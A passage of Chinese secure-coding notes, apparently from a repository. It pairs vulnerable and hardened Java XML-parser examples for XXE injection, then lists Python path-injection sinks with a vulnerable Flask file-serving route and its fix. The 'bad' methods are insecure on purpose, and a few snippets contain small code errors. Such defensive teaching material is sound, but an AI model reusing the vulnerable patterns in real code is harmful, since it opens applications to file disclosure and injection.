spf.setFeature("http://xml.org/sax/features/external-general-entities", false); 484 | spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 485 | spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 486 | SAXParser parser = spf.newSAXParser(); 487 | parser.parse(servletInputStream, new HandlerBase()); 488 | } 489 | ``` 490 | 491 | ## SAXReader XXE注入 492 | 493 | ```java 494 | import javax.xml.parsers.SAXParser; 495 | import javax.xml.parsers.SAXParserFactory; 496 | 497 | public void badSAXParser(HttpServletRequest request) throws Exception { 498 | ServletInputStream servletInputStream = request.getInputStream(); 499 | SAXReader saxReader = new SAXReader(); 500 | saxReader.read(InputSource); 501 | } 502 | 503 | public void okSAXParser(HttpServletRequest request) throws Exception { 504 | ServletInputStream servletInputStream = request.getInputStream(); 505 | SAXParserFactory spf = SAXParserFactory.newInstance(); 506 | spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 507 | spf.setFeature("http://xml.org/sax/features/external-general-entities", false); 508 | spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 509 | spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 510 | SAXParser parser = spf.newSAXParser(); 511 | parser.parse(servletInputStream, new HandlerBase()); 512 | } 513 | ``` 514 | 515 | ## XMLReader XXE注入 516 | 517 | ```java 518 | import org.xml.sax.XMLReader; 519 | import org.xml.sax.helpers.XMLReaderFactory; 520 | 521 | public void badXMLReader(HttpServletRequest request) throws Exception { 522 | ServletInputStream servletInputStream = request.getInputStream(); 523 | XMLReader reader = XMLReaderFactory.createXMLReader(); 524 | reader.parse(new InputSource(servletInputStream)); 525 | } 526 | 527 | public void okXMLReader(HttpServletRequest request) throws Exception { 528 | ServletInputStream servletInputStream = request.getInputStream(); 529 | XMLReader reader = XMLReaderFactory.createXMLReader(); 530 | reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 531 | reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 532 | reader.setFeature("http://xml.org/sax/features/external-general-entities", false); 533 | reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 534 | reader.parse(new InputSource(servletInputStream)); 535 | } 536 | ``` 537 | 538 | ## Transformer XXE注入 539 | 540 | ```java 541 | import javax.xml.transform.TransformerFactory; 542 | import org.xml.sax.helpers.XMLReaderFactory; 543 | 544 | public void badTransformer(HttpServletRequest request) throws Exception { 545 | ServletInputStream servletInputStream = request.getInputStream(); 546 | TransformerFactory tf = TransformerFactory.newInstance(); 547 | StreamSource source = new StreamSource(servletInputStream); 548 | tf.newTransformer().transform(source, new DOMResult()); 549 | } 550 | 551 | public void okTransformer(HttpServletRequest request) throws Exception { 552 | ServletInputStream servletInputStream = request.getInputStream(); 553 | TransformerFactory tf = TransformerFactory.newInstance(); 554 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 555 | tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 556 | StreamSource source = new StreamSource(servletInputStream); 557 | tf.newTransformer().transform(source, new DOMResult()); 558 | } 559 | ``` 560 | 561 | ## TransformerFactory XXE注入 562 | 563 | ```java 564 | import javax.xml.transform.TransformerFactory; 565 | 566 | public void badTransformerFactory(HttpServletRequest request) throws Exception { 567 | ServletInputStream servletInputStream = request.getInputStream(); 568 | //实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 569 | TransformerFactory transformerFactory = TransformerFactory.newInstance(); 570 | transformerFactory.newTransformer(new StreamSource(servletInputStream)); 571 | } 572 | 573 | public void okTransformerFactory(HttpServletRequest request) throws Exception { 574 | ServletInputStream servletInputStream = request.getInputStream(); 575 | TransformerFactory transformerFactory = TransformerFactory.newInstance(); 576 | transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 577 | transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 578 | transformerFactory.newTransformer(new StreamSource(servletInputStream)); 579 | } 580 | ``` 581 | 582 | ## SAXTransformerFactory XXE注入 583 | 584 | ```java 585 | import javax.xml.transform.sax.SAXTransformerFactory; 586 | 587 | public void bad1SAXTransformerFactory(HttpServletRequest request) throws Exception { 588 | ServletInputStream servletInputStream = request.getInputStream(); 589 | //实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 590 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 591 | StreamSource source = new StreamSource(servletInputStream); 592 | sf.newTransformerHandler(source); 593 | } 594 | 595 | public void bad2SAXTransformerFactory(HttpServletRequest request) throws Exception { 596 | ServletInputStream servletInputStream = request.getInputStream(); 597 | //实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 598 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 599 | StreamSource source = new StreamSource(servletInputStream); 600 | sf.newTransformer(source); 601 | } 602 | 603 | public void bad3SAXTransformerFactory(HttpServletRequest request) throws Exception { 604 | ServletInputStream servletInputStream = request.getInputStream(); 605 | //实际创建com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl对象 606 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 607 | StreamSource source = new StreamSource(servletInputStream); 608 | sf.newXMLFilter(source); 609 | } 610 | 611 | public void okSAXTransformerFactory(HttpServletRequest request) throws Exception { 612 | ServletInputStream servletInputStream = request.getInputStream(); 613 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 614 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 615 | sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, ""); 616 | StreamSource source = new StreamSource(servletInputStream); 617 | sf.newTransformerHandler(source); 618 | } 619 | ``` 620 | 621 | 622 | ## SchemaFactory XXE注入 623 | 624 | ```java 625 | import javax.xml.validation.Schema; 626 | import javax.xml.validation.SchemaFactory; 627 | 628 | public void badSchemaFactory(HttpServletRequest request) throws Exception { 629 | ServletInputStream servletInputStream = request.getInputStream(); 630 | //实际创建com.sun.org.apache.xerces.internal.jaxp.validation.XMLSchemaFactory对象 631 | SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); 632 | StreamSource source = new StreamSource(servletInputStream); 633 | Schema schema = factory.newSchema(source); 634 | } 635 | 636 | public void okSchemaFactory(HttpServletRequest request) throws Exception { 637 | ServletInputStream servletInputStream = request.getInputStream(); 638 | SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema"); 639 | factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 640 | factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, ""); 641 | StreamSource source = new StreamSource(servletInputStream); 642 | Schema schema = factory.newSchema(source); 643 | } 644 | ``` 645 | 646 | ## Unmarshaller XXE注入 647 | 648 | Unmarshaller在jdk 1.8后修复了xxe注入 649 | 650 | ```java 651 | import javax.xml.bind.JAXBContext; 652 | import javax.xml.bind.Unmarshaller; 653 | 654 | public void badXPathExpression(HttpServletRequest request) throws Exception { 655 | ServletInputStream servletInputStream = request.getInputStream(); 656 | JAXBContext jaxbContext = JAXBContext.newInstance(Test.class); 657 | Unmarshaller unmarshaller = jaxbContext.createUnmarshaller(); 658 | unmarshaller.unmarshal(servletInputStream); 659 | } 660 | 661 | 662 | Test.java 663 | 664 | import java.io.Serializable; 665 | import javax.xml.bind.annotation.XmlRootElement; 666 | 667 | @XmlRootElement(name="name") 668 | public class Test implements Serializable { 669 | 670 | private Integer id; 671 | 672 | private String name; 673 | 674 | private String pass; 675 | 676 | public Integer getId() { 677 | return id; 678 | } 679 | 680 | public void setId(Integer id) { 681 | this.id = id; 682 | } 683 | 684 | public String getName() { 685 | return name; 686 | } 687 | 688 | public void setName(String name) { 689 | this.name = name; 690 | } 691 | 692 | public String getPass() { 693 | return pass; 694 | } 695 | 696 | public void setPass(String pass) { 697 | this.pass = pass; 698 | } 699 | 700 | @Override 701 | public String toString() { 702 | return "Test{" + 703 | "id=" + id + 704 | ", name='" + name + '\'' + 705 | ", pass='" + pass + '\'' + 706 | '}'; 707 | } 708 | } 709 | 710 | ``` 711 | 712 | ## XPathExpression XXE注入 713 | 714 | 调用Document.parse(...)解析 715 | 716 | ```java 717 | import javax.xml.xpath.XPath; 718 | import javax.xml.xpath.XPathExpression; 719 | import javax.xml.xpath.XPathFactory; 720 | 721 | public void badXPathExpression(HttpServletRequest request) throws Exception { 722 | ServletInputStream servletInputStream = request.getInputStream(); 723 | XPath xPath = XPathFactory.newInstance().newXPath(); 724 | XPathExpression xPathExpression = xPath.compile("xxe"); 725 | xPathExpression.evaluate(new InputSource(servletInputStream)); 726 | } 727 | ``` 728 | 729 | ## Persister XXE注入 730 | 731 | ```pom 732 | 733 | org.simpleframework 734 | simple-xml 735 | 2.7.1 736 | 737 | ``` 738 | 739 | ```java 740 | import org.simpleframework.xml.core.Persister; 741 | 742 | public void badPersister(HttpServletRequest request) throws Exception { 743 | ServletInputStream servletInputStream = request.getInputStream(); 744 | Persister persister = new Persister(); 745 | persister.read("", servletInputStream); 746 | } 747 | ``` 748 | -------------------------------------------------------------------------------- /python/logInjection/note.md: -------------------------------------------------------------------------------- 1 | # Python日志注入 2 | -------------------------------------------------------------------------------- /python/pathInjection/note.md: -------------------------------------------------------------------------------- 1 | # Python路径注入 2 | 3 | 4 | sinks 5 | 6 | 7 | 文件读取 8 | ```python 9 | flask.send_file;Argument[0] # 读取文件 10 | fastapi.responses.FileResponse;Argument[0] # 读取文件 11 | ``` 12 | 13 | 文件删除 14 | ```python 15 | os.remove;Argument[0] # 删除文件 16 | os.unlink;Argument[0] # 删除文件 17 | os.removedirs;Argument[0] # 删除多级目录 18 | os.rmdir;Argument[0] # 删除目录 19 | shutil.rmtree;Argument[0] # 删除目录 20 | ``` 21 | 22 | 其他 23 | ```python 24 | os.open;Argument[0] # 该方法返回文件对象,可进行文件读取、写入、获取文件信息等操作 25 | os.chdir;Argument[0] # 将当前工作目录更改为指定路径 26 | os.renames;Argument[0, 1] # 将old文件夹或文件移动到new文件夹或文件 27 | os.rename;Argument[0, 1] # 将src文件夹或文件移动到dst文件夹或文件 28 | os.replace;Argument[0, 1] # 将文件或目录src重命名为dst 29 | os.scandir;Argument[0] # 返回目录 30 | os.listdir;Argument[0] # 返回目录 31 | os.stat;Argument[0] # 获取文件或文件描述符的状态 32 | os.lstat;Argument[0] # 获取文件或文件描述符的状态 33 | os.truncate;Argument[0] # 截断文件为指定长度 34 | os.makedirs;Argument[0] # 递归创建文件夹 35 | os.mkdir;Argument[0] # 创建文件夹 36 | os.access;Argument[0] # 判断当前用户是否对指定文件有指定的访问权限,多用于判断文件访问权限后读取或写入文件 37 | os.chflags;Argument[0] # 将路径flags设置为目标flags, 例如:只读. 只支持在 Unix 下使用 38 | os.lchflags;Argument[0] # 将路径flags设置为目标flags. 只支持在 Unix 39 | os.chmod;Argument[0] # 将路径flags设置为目标flags, 例如:只读. 40 | os.lchmod;Argument[0] # 将路径mode设置为目标mode. 只支持在 Unix 41 | os.chown;Argument[0] # 将路径的所有者和组 ID 更改为数字uid和gid. 只支持在 Unix 42 | os.chroot;Argument[0] # 将当前进程的根目录更改为path. 只支持在 Unix 43 | os.lchown;Argument[0] # 将路径的所有者和组ID更改为数字uid和gid. 只支持在 Unix 44 | os.link;Argument[0, 1] # 创建一个指向名为dst的src的硬链接. 支持Unix、Windows 45 | os.mkfifo;Argument[0] # 创建文件 46 | os.pathconf;Argument[0] # 返回文件指定配置信息 47 | ``` 48 | 49 | 50 | 示例 51 | 52 | ```python 53 | from flask import Flask, send_file 54 | 55 | app = Flask(__name__) 56 | 57 | @app.route('/') 58 | def hello_world(path): 59 | return send_file(path) 60 | 61 | 62 | if __name__ == '__main__': 63 | app.run() 64 | ``` 65 | 66 | 修复 67 | 68 | ```python 69 | from werkzeug.utils import secure_filename 70 | from flask import Flask, send_file 71 | 72 | app = Flask(__name__) 73 | 74 | @app.route('/') 75 | def hello_world(path): 76 | path = secure_filename(path) 77 | return send_file(path) 78 | 79 | 80 | if __name__ == '__main__': 81 | app.run() 82 | ``` 83 | --------------------------------------------------------------------------------